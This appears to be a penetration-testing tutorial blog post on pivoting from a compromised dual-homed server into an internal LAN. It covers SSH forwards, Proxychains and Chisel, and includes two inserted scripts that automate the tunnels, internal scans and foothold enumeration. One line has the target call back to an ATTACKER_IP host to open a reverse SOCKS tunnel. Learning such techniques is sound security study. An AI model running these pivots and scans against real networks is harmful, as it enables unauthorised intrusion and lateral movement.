DEV Community

Devon Argent


Day 25: Network Pivoting — Breaking Into the Internal LAN 🕵️‍♂️

🛠️ The Art of the Pivot

Pivoting is the process of using a compromised system to attack other systems on the internal network it sits on. If the web server is dual-homed (one interface facing the Internet, one on the LAN), it becomes our bridge: traffic we push into it comes out on the LAN side with the web server's own address.

1. SSH Dynamic Port Forwarding (The All-Rounder)

Running ssh -D 1080 user@target opens a SOCKS proxy on 127.0.0.1:1080 of my machine; every connection sent to that port is made by the target on the other side of the tunnel. Combined with Proxychains (with socks5 127.0.0.1 1080 in its ProxyList), I can run any TCP-based tool as if my computer were physically plugged into the internal network. Two caveats: SOCKS only carries TCP, so ICMP pings and raw-packet scans never leave my box, and DNS lookups leak locally unless proxy_dns is set in the Proxychains config.

  • Command: proxychains nmap -sT -Pn 192.168.1.10 (-Pn skips the ICMP host discovery, -sT uses full TCP connects instead of raw SYN packets; both are required through a SOCKS proxy)

2. Local Port Forwarding (The Specialist)

When I only need access to a specific internal service, like a database, a single local forward is simpler than a proxy:

  • Command: ssh -N -L 3306:192.168.1.10:3306 user@jump-box (-N keeps the session as a tunnel only, no remote shell)
  • Result: I can now connect to the internal database by simply pointing my client to 127.0.0.1:3306. The jump box makes the actual connection, so the database only ever sees the jump box's address.

3. Chisel: The Advanced Tunnel

In environments where SSH is restricted or closely monitored, Chisel is a lifesaver. It is a single static Go binary for both ends that tunnels over a WebSocket, so on the wire the connection looks like an HTTP upgrade, and it can carry SOCKS traffic back to the attacker.

  • Attacker Side: chisel server -p 8000 --reverse
  • Target Side: chisel client ATTACKER_IP:8000 R:1080:socks
  • Result: a SOCKS proxy appears on port 1080 of the attacker machine, and Proxychains is pointed at it exactly as with the SSH -D case. Chisel binds reverse forwards on all interfaces unless told otherwise, so prefer R:127.0.0.1:1080:socks to keep the proxy off your own external interface.
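The three tunnels above, wired together as an added example (this is my own script, not code from the original post). It writes a throw-away Proxychains config, starts each forward with the flags that make it safe to script (no remote shell, fail if the bind fails) and waits until the tunnel port is actually listening before pushing tools through it. user@jump-box, 192.168.1.10, the port numbers and the tool names are assumed placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): stand up the pivots the post
# describes and wait until each tunnel listens before using it.
# Assumptions: user@jump-box is the dual-homed foothold, 192.168.1.10 is a
# host behind it, and proxychains4, nmap, chisel and mysql are installed on
# the attacker machine. Every host and port here is a placeholder.
set -eu

# proxychains' stock config points at Tor (9050); write one for our pivot.
# proxy_dns keeps name lookups inside the tunnel instead of leaking locally.
write_proxychains_conf() {            # $1 = config path, $2 = SOCKS port
  cat >"$1" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $2
EOF
}

# True if a TCP listener answers on host:port (bash /dev/tcp, no nc needed).
port_open() {                         # $1 = host, $2 = port
  (exec 3<>"/dev/tcp/$1/$2") 2>/dev/null
}

# Poll until the forwarded port is up, or fail after $3 seconds (default 10).
wait_for_port() {                     # $1 = host, $2 = port, $3 = timeout
  local deadline=$(( $(date +%s) + ${3:-10} ))
  until port_open "$1" "$2"; do
    [ "$(date +%s)" -lt "$deadline" ] || return 1
    sleep 1
  done
}

# 1. Dynamic forward: SOCKS proxy on 127.0.0.1:$2.  -N: no remote shell,
#    -f: background after auth, ExitOnForwardFailure: die if the bind fails.
start_socks_pivot() {                 # $1 = user@jump-box, $2 = local port
  ssh -f -N -o ExitOnForwardFailure=yes -D "127.0.0.1:$2" "$1"
  wait_for_port 127.0.0.1 "$2"
}

# 2. Local forward: 127.0.0.1:$2 -> $3:$4, as seen from the jump box.
start_local_forward() {               # $1 = user@jump-box, $2 = lport, $3 = rhost, $4 = rport
  ssh -f -N -o ExitOnForwardFailure=yes -L "127.0.0.1:$2:$3:$4" "$1"
  wait_for_port 127.0.0.1 "$2"
}

# 3. Chisel: run the server here; the target runs
#    `chisel client ATTACKER_IP:$1 R:127.0.0.1:$2:socks`, which opens a
#    SOCKS proxy on our 127.0.0.1:$2 once it connects.
start_chisel_server() {               # $1 = listen port, $2 = reverse SOCKS port
  chisel server -p "$1" --reverse >/dev/null 2>&1 &
  echo "waiting for a chisel client to open 127.0.0.1:$2 ..."
  wait_for_port 127.0.0.1 "$2" 300
}

main() {
  local conf
  conf=$(mktemp)
  write_proxychains_conf "$conf" 1080
  start_socks_pivot user@jump-box 1080
  # SOCKS carries TCP only: skip the ICMP host discovery (-Pn) and use a
  # full-connect scan (-sT); a raw SYN scan cannot go through the proxy.
  proxychains4 -q -f "$conf" nmap -sT -Pn -p 22,80,445,3306 192.168.1.10
  start_local_forward user@jump-box 3306 192.168.1.10 3306
  mysql -h 127.0.0.1 -P 3306 -u root -p
}

# Run with `./pivot.sh up` to start the tunnels; sourcing only loads helpers.
if [ "${1:-}" = up ]; then main; fi
```

Swap start_socks_pivot for start_chisel_server when SSH out of the foothold is not an option; the Proxychains config and the nmap flags stay the same because both paths end in a SOCKS proxy on 127.0.0.1:1080.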

🕵️‍♂️ Internal Enumeration Checklist

Once you land on the first box, look for:

  1. Interfaces: ip a (look for private ranges: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16; a second address in one of these means the box is dual-homed).
  2. ARP Cache: arp -a or ip neigh (see who else this machine has recently talked to; these are live hosts on the LAN and a ready-made scan list).
  3. Listening services: netstat -tulnp or ss -tulnp (find services bound only to 127.0.0.1 or to the internal interface; those are reachable through a port forward but not from the Internet).
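The checklist as a script you can drop on the foothold, written as an added example (not from the original post). It turns the three checks into filters: is_rfc1918 gets the private ranges right (including 172.16.0.0/12, which is only 172.16 to 172.31), internal_ifaces picks out LAN-side interfaces from ip -o -4 addr, neigh_targets builds a scan list from ip neigh, and internal_listeners flags services not bound to every interface in netstat -tulnp or ss -tulnp output. The SAMPLE_* strings are constructed input in the format those commands print, so the script can be exercised offline; interface names and addresses in them are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): triage the first foothold.
# Run `./enum.sh run` on the compromised box; without "run" it only
# defines the functions so they can be sourced or tested.
set -eu

# RFC 1918 check: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16.
is_rfc1918() {                        # $1 = dotted-quad IPv4 address
  local a=${1%%.*} rest=${1#*.} b
  b=${rest%%.*}
  case "$a" in
    10) return 0 ;;
    172) [ "$b" -ge 16 ] && [ "$b" -le 31 ] && return 0 ;;
    192) [ "$b" -eq 168 ] && return 0 ;;
  esac
  return 1
}

# stdin: `ip -o -4 addr show`  ->  "dev cidr" for every private address.
internal_ifaces() {
  awk '{print $2, $4}' |
  while read -r dev cidr; do
    is_rfc1918 "${cidr%/*}" && echo "$dev $cidr" || true
  done
}

# stdin: `ip neigh show`  ->  private neighbours the box has resolved,
# skipping FAILED/INCOMPLETE entries. Feed the result to `nmap -iL`.
neigh_targets() {
  awk '$NF != "FAILED" && $NF != "INCOMPLETE" {print $1}' |
  while read -r ip; do
    is_rfc1918 "$ip" && echo "$ip" || true
  done
}

# stdin: `netstat -tulnp` or `ss -tulnp`  ->  listeners NOT bound to the
# wildcard address, tagged by where they are reachable from. netstat keeps
# the local address in field 4, ss in field 5; field 2 tells them apart.
internal_listeners() {
  awk '$1 ~ /^(tcp|udp)/ {
         loc = ($2 ~ /^[0-9]+$/) ? $4 : $5
         if (loc !~ /^(0\.0\.0\.0|::|\*|\[::\]):/) print loc, $NF }' |
  while read -r sock prog; do
    local host=${sock%:*}
    case "$host" in
      127.*) echo "$sock $prog (loopback: reach via port forward)" ;;
      *) is_rfc1918 "$host" && echo "$sock $prog (internal LAN)" || echo "$sock $prog" ;;
    esac
  done
}

# Constructed sample output (assumed hosts), in the real commands' formats.
SAMPLE_IP_ADDR='1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever
2: eth0    inet 203.0.113.10/24 brd 203.0.113.255 scope global eth0\       valid_lft forever preferred_lft forever
3: eth1    inet 192.168.1.5/24 brd 192.168.1.255 scope global eth1\       valid_lft forever preferred_lft forever'

SAMPLE_NEIGH='192.168.1.1 dev eth1 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.20 dev eth1 lladdr 00:11:22:33:44:66 STALE
203.0.113.1 dev eth0 lladdr 00:11:22:33:44:77 REACHABLE
192.168.1.99 dev eth1 FAILED'

SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1234/nginx
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1300/mysqld
tcp        0      0 192.168.1.5:8080        0.0.0.0:*               LISTEN      1400/java
tcp6       0      0 :::22                   :::*                    LISTEN      900/sshd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           500/dhclient'

main() {
  echo "== interfaces on private ranges =="
  ip -o -4 addr show | internal_ifaces
  echo "== neighbours worth scanning =="
  ip neigh show | neigh_targets
  echo "== services not bound to every interface =="
  { ss -tulnp 2>/dev/null || netstat -tulnp; } | internal_listeners
}

if [ "${1:-}" = run ]; then main; fi
```

On the sample data the script reports eth1 192.168.1.5/24 as the LAN-side interface, 192.168.1.1 and 192.168.1.20 as scan targets, and flags mysqld on 127.0.0.1:3306 (reach it with a local forward to 127.0.0.1) and the Java service on 192.168.1.5:8080 (reach it through the SOCKS pivot); nginx and sshd on the wildcard address are left out because they are visible from the Internet anyway.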

Follow my journey: #1HourADayJourney
